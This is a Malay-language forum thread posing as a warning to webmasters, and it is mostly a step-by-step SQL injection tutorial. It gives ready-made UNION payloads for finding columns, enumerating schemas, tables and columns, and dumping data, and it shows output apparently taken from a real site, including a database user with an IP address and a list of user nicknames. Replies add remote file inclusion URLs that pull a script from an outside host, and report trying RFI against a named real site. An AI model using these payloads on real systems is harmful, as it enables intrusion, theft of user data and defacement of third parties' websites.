SQL Injection [tutorial]

Sy buka topik ni coz kebanyaan webmaster di negara kita termasuk beberapa site dgn xtension GOV berpotensi untuk digodam oleh script-kiddie. klu H A C K e R yg advanced dn mgkin da lama data2 yg enting tu da hilang. So, klu anda sorang webmaster, anda sepatutnya tahu mengenai SQLi ni.

PeNGENALAN
SQL adalah singkatan kepada Structured Query Language. SQL digunakan untuk berkomunikasi dengan database dlm sesuatu sistem (applikasi web). Beberapa database yang biasa digunakan adalah Oracle, MySQL, Sybase, Access, Ingres, dn byk lagi.
beberapa arahan yg standard untuk SQL ni seperti Select, Insert, Drop, Delete, Update, dan juga Create.

PeNGeNALAN KePADA SQLi (SQL INJeCTION)
SQLi adalah satu teknik dimana penggodam menggunakan kelemahan sistem itu sendiri dgn memasukkan arahan ke dalam Form Input ataupun dlm URL itu sendiri.
Kebanyakan SQLi dilakukan dlm URL sbb ia memberikan 'error yg spesel'.

APA YANG MeReKA BOLeH BuAT DeNGAN SQLi?
Data yg penting seperti password admin, password user, username, username admin, username superadmin, email, dn mcm2 lg.

setelah suma data ni abis dihisap oleh penggodam, kebanyakannya akan meletakkan backdoor pada sistem anda dgn menggunakan arahan Create, dan Insert.

Lebih sadis jika penggodam itu menghapuskan semua data dlm sistem anda dgn arahan Delete atau Drop.

CARA MeNGeTAHUI WeBSITe BOLEH DISeRANG DGN SQLi
contoh:
1. katakan anda menjumpai satu site dgn alamat seperti ni>

http://www.contoh.com/index.php?id=89

2. untuk mengetahui jika site itu boled diserang dgn cara SQLi adalah sgt mudah. anda hanya perlu meletakkan ' di hujung url tersebut.

http://www.contoh.com/index.php?id=89'

3. jika anda mendapat pparan error seperti ni>

Spoiler:

Spoiler:

Spoiler:

atau anda mendapat halaman yg tidak lengkap seperti halaman yg kosong shj.

4. VOiLLa!! site tersebut boleh diserang dgn SQLi.

MeNGeTAHUI BILANGAN COLUMN
1. seblum anda dpt bergerak ke aktiviti seterusnya, anda harus tahu berapa byk bilangan column website tersebut.

2. masukkan arahan seperti ini:

http://www.contoh.com/index.php?id=89+ORDER+BY+1--

atau

http://www.contoh.com/index.php?id=89+ORDER+BY+1/*

atau

http://www.contoh.com/index.php?id=89+ORDER+BY+1#

3. seterusnya, tambahkan nilai 1 tersebut sehingga anda mendapat error seperti ini:

Spoiler:

4. ini bermaksud, nilai column dlm website ni kurang dari 13
5. jika anda mendapat error ni, kurang nombor tersebur sehingga anda mendapat halaman yg normal.
6. contoh:

anda meletakkan nombor 13 pada url

http://www.contoh.com/index.php?id=89+ORDER+BY+13--

anda mendapat error

Spoiler:

seterusnya anda meletakkan nombor 12 dlm URL

http://www.contoh.com/index.php?id=89+ORDER+BY+12--

anda mendapat halaman normal i.e: website to x kuarkan apa2 error

Bilangan column yg ada pada website ni adalah 12


COLUMN YANG BOLeH DISeRANG
column yang boleh diserang dgn SQLi boleh diketahui dgn arahan

AND 1=0 UNION SELECT ALL

AND 1=0 bermaksud, database tu akan sentiasa mentafsirkan arahan anda sebagai error

1. menentukan column yang bolh di serang dgn memasukkan arahan di atas pada URL

http://www.contoh.com/index.php?id=89+AND+1=0+UNION+SELECT+ALL+1,2,3,4,5,6,7,8,9,10,11,12--

atau

http://www.contoh.com/index.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--

arahan ini akan menunjukkan nombor column yang boleh diserang pada website tersebut.

contoh: sebaik sahaja anda meletakkan arahan tersebut, ada nombor yang keluar pada website tersebut.



dari sini, kita dpt kenal pasti bahawa column yang boleh diserang adalah column 1,2,3, dan 4


MeNGeTAHUI VeRSI DATABASe
sekarang kita boleh mengetahui versi database tersebut dgn memasukkan arahan pada column yang boleh diserang td.

arahan:
@@version
version()
concat_ws(0x3a,version(),user(),database()) <-- advanced

kita akan memasukkan salah sati arahan di atas pda column yg vuln td. (contoh: sy gnkn column nombor 2)

http://www.contoh.com/index.php?id=89+AND+1=0+UNION+SELECT+ALL+1,@@version,3,4,5,6,7,8,9,10,11,12--

http://www.contoh.com/index.php?id=89+AND+1=0+UNION+SELECT+ALL+1,version(),3,4,5,6,7,8,9,10,11,12--

http://www.contoh.com/index.php?id=89+AND+1=0+UNION+SELECT+ALL+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12--

dari sini, kita dpt tahu:

Versi: 5.0.81
User: yaumh@202.190.197.138
Database: penang

SQL 4 vs SQL 5
tutorial ini hanya melibat website yang mengunakan SQL versi 5. dlm SQL 4, database dinamakan sendiri oleh webmaster. nama2 ini juga tidak dikumpulkan dlm stu pusat seperti SQL 5 yang menggunakan konsep information_schema.

Untuk melihat semua database dlm SQL 5, kita gnkan arahan

group_concat(schema_name) ... from information_schema.schemata

contoh:

http://www.contoh.com/index.php?id=89+ALL+1=0+UNION+SELECT+ALL+1,group_concat(schema_name),3,4,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.SCHEMATA--

database yg ada:

information_schema
kuching
msiahelp
penang

MeNCARI NAMA TABLe
selepas kita dpt nama database, seterusnya kita boleh mendapat nama table yg ada dlm database tersebut.

group_concat(table_name)..+from+information_schema.tables+where+table_schema=database()

contoh:

http://www.contoh.com/index.php?id=89+ALL+1=0+UNION+SELECT+ALL+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--

table yg ada dlm database()
chanstats
comments
monitor
news
people
profiles
quotes
userstats
vote


MeNDAPATKAN NAMA COLUMN DALAm TABLe

cara mendapat nama colum dalam suatu table adalah dgn menggunakan arahan

group_concat(column_name)...+from+information_schema.columns+where+table_name=***nama table**--

contoh: sy gnakan table> people

http://www.contoh.com/index.php?id=89+ALL+1=0+UNION+SELECT+ALL+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='people'--

oppss.. dpt error

Spoiler:

cara yg betul adalah menukarkan people kepada hexadecimal. (download encoder tool>http://www.megaupload.com/?d=FGFMN7NV)

jd,

people menjadi 0x70656F706C65

seterusnya tkar people dgn hex tersebut dlm URL

http://www.contoh.com/index.php?id=89+ALL+1=0+UNION+SELECT+ALL+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x70656F706C65--

Voilla!!

column yg ada
id
nickname
category
access

MiNiNG DATA
kita tahu nama database, nama table, dan juga nama column. seterunya kita boleh melihat semua data dalam column yg kita kehendaki.

group_concat(***nama column)...+from+**nama table

contoh: nama table: people nama column:id nickname category access
(sy hya akn gn column: nicname dn access)

http://www.contoh.com/index.php?id=89+ALL+1=0+UNION+SELECT+ALL+1,group_concat(nickname,0x3a,access),3,4,5,6,7,8,9,10,11,12+FROM+people--

(sy tukar ke column 3 coz t'lalu besar)

see.. username utk site ni. Nama ko pun ada jg x? haha

username Access
Gawd 3
Kidz 2
Fully_Alive 2
Isaac:1,Kelv 1
cHoChObO 1
girl^_19 1
TcK:2,mandytmm 1
sojai6 1
Micintosh 1
HanzZ 1
bash 2
Fionna 1
Resists 1
Darknet 1
^-^ 3
soon^_^ 1
Oraculum 1
dolly^o^liss 1
esprit 1
yushi 1
rlinux 1
minicompo 1
V^v|aN 1
Card|naL 1



dgn cara cmni je, satu website tu boleh dihancurkan. So, hati2 bila membangunkan website. Sentiasa backup data dan gn ENCRYPTION terutama utk password dan username.

terima kasih banyak-banyak!

wah bagus2 , aku sekadar tau apa tu sql injection je cuma contoh yang senang difahami kurang sebelum ni . Harap2 tutorial ni tak hilang tetiba

hm... terima kasih byk2 bro for da info..
bahaya tul la..
skrg ni aku tgh blaja n praktis guna framework(CodeIgniter)..
Agak2 leh x kene SQL Injection? sbb dia guna konsep MVC(Model View Controller),
pastu xde pas guna url mcm biasa,
cthnya kalo biasa buat mcm ni, http://www.example.com/index.php?page=news&id=17&tri=8&web=sub
guna CI, url kita leh buat mcm ni, http://www.example.com/index.php/news/17/8/sub

rasanya lebih selamat kot. Hehehe.. Entah la..

dans kam wrote:hm... terima kasih byk2 bro for da info..
bahaya tul la..
skrg ni aku tgh blaja n praktis guna framework(CodeIgniter)..
Agak2 leh x kene SQL Injection? sbb dia guna konsep MVC(Model View Controller),
pastu xde pas guna url mcm biasa,
cthnya kalo biasa buat mcm ni, http://www.example.com/index.php?page=news&id=17&tri=8&web=sub
guna CI, url kita leh buat mcm ni, http://www.example.com/index.php/news/17/8/sub

rasanya lebih selamat kot. Hehehe.. Entah la..

klu cmni mmg selamat sikit dari kena serangan SQLi. tp, ko masih gn PHP. klu coding ko BURUK dn gn kaedah POST atau GET utk paparkan data, ko blh kena RFi a.k.a Remote File inclusion.

satu lg, klu ko gn server Apache yg x kena patch, penyerang blh gn serangan dari server (server-side attack) dgn mggnkan bug dari server tu sndri. gn kaedah rewritable.

cth:

http://www.example.com/index.php/news/17/8/sub

URL asal

http://www.example.com/index.php?=http://www.RFIskrip.com?

URL baru.

atau

http://www.example.com/index.php?=http://www.RFIskript.com?%00

gn nullbyte.

klu coding ko lemah tmbhn lg server ko x selamat, website ko da kena serang dgn RFI.

pastikan server ko tu selamat dn kena patch dgn sekuriti terbaru.

Hm..
TQ xenomorf sbb sentuh jugak pasal server. kalo x aku langsung x terfikir. hehehe...

tapi aku still rasa guna CI ni lebih selamat sebab..
sebab, aku test url yang mcm ko bg tu,

http://www.example.com/index.php/?=http://www.RFIskript.com?%00

, kuar 'The URI you submitted has disallowed characters.'. (aku xtau cara betul utk inject ikut url ni.. sori)
Mungkin jugak sebab secara defaultnya CI dah disable fungsi GET

satu lagi, struktur url CI-based website bukan mcm struktur website biasa,

http://www.example.com/index.php/syarikat/ejen/17

=>

http://www.example.com/index.php/

--> base url (index.php/ tu bleh hilangkan guna .htaccess)

syarikat/

--> nama class

ejen/

--> nama method/function

17

--> data yang kita hantar

tq xenomorf sebab sharing..
aku bertanya untuk tambah pengetahuan. maaf la kalo contoh URL aku kat post sblm ni kurang sesuai untuk bgtau struktur url CI.


Sharing is good!...

Mengkagumkan.
tapi klu web PHPnuke yang ada sentinel protection mcmna? macam http://mydungun.com.my/v2 ni?

dans kam wrote:Hm..
TQ xenomorf sbb sentuh jugak pasal server. kalo x aku langsung x terfikir. hehehe...

tapi aku still rasa guna CI ni lebih selamat sebab..
sebab, aku test url yang mcm ko bg tu,

http://www.example.com/index.php/?=http://www.RFIskript.com?%00

, kuar 'The URI you submitted has disallowed characters.'. (aku xtau cara betul utk inject ikut url ni.. sori)
Mungkin jugak sebab secara defaultnya CI dah disable fungsi GET

satu lagi, struktur url CI-based website bukan mcm struktur website biasa,

http://www.example.com/index.php/syarikat/ejen/17

=>

http://www.example.com/index.php/

--> base url (index.php/ tu bleh hilangkan guna .htaccess)

syarikat/

--> nama class

ejen/

--> nama method/function

17

--> data yang kita hantar

tq xenomorf sebab sharing..
aku bertanya untuk tambah pengetahuan. maaf la kalo contoh URL aku kat post sblm ni kurang sesuai untuk bgtau struktur url CI.


Sharing is good!...

thx!

gn .htaccess jg slh satu lgkah keselamatan yg baik. tp biasanya, (browser yg masih blum update) klu ko hilangkn index.php/ tu dgn .htaccess user tu x akn dpt error pasal permission. tp klu browser yg baru, masalah ni x timbul da.

sentiasa periksa keadaan PHP ko dgn cara melihat pada phpinfo()

bt satu page php dgn kod ni dn tengok klu ada module yg ko x mau, ko disable dlm config php ko.

Code:


<?php
  phpinfo();
?>


ko save dgn ext php. pastu ko access la dn tgok setting phpinfo() ko.

masokis wrote:Mengkagumkan.
tapi klu web PHPnuke yang ada sentinel protection mcmna? macam http://mydungun.com.my/v2 ni?

haha.. ok. klu ko baca intro sy kat atas tu, GOV yg sy mksudkn tu gn PHPNuke jg. dan x kena PATCH. haha.. ko kena sentiasa cari update utk PHPNuke ni sbb byk lubang2 yg x diingini.

tp tgok page ni bila sy try bt RFI.



P/S: jgn cuba nk trace IP tu coz ko akn kecewa.

masokis wrote:Mengkagumkan.
tapi klu web PHPnuke yang ada sentinel protection mcmna? macam http://mydungun.com.my/v2 ni?

Tak kira dia pakai sentinel macam mana pun, ada jugak cara nak tembus...
Ikut kreativiti hackerz tu sendiri